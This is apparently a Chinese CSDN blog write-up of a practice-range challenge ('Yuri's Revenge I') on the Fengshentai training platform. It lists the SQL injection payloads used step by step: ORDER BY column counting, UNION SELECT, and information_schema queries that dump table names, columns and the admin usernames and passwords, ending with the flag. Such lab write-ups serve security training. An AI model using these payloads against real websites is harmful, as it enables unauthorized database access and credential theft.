封神台--尤里的复仇Ⅰ小芳!

文章详细描述了一次针对名为女神小芳的网站进行的SQL注入过程,通过测试1/0和1/1确定了数字型注入。逐步揭露了数据库名称(maoshe)、表名(admin、dirs、news、xss)、字段信息以及admin表的username和password,最终获取到flag为hellohack的敏感数据。
摘要由CSDN通过智能技术生成

目录

第一章:为了女神小芳!


第一章:为了女神小芳!

进入传送门,点击超级链接。注入1/1和1/0,发现1/0有明显变化,1/1无变化,先确定为数字型注入。

注入1 order by n,n取1-3,当n为1和2时页面正常,当为3是页面异常,判断回显字段最多为2个。

注入100 union select 1,2,得到一个回显位(2)。

注入100 union select 1,database()回显出数据库(maoshe)。

注入100 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='maoshe')回显出数据库中的表(admin、dirs、news、xss)。

注入100 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='admin')回显admin表中的字段(Id、username、password )。

注入100 union select 1,(select group_concat(username) from admin)回显admin表中username字段(admin、ppt领取微信 )。

注入100 union select 1,(select group_concat(password) from admin)回显admin表中password字段(hellohack、zkaqbanban),其中flag为hellohack。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值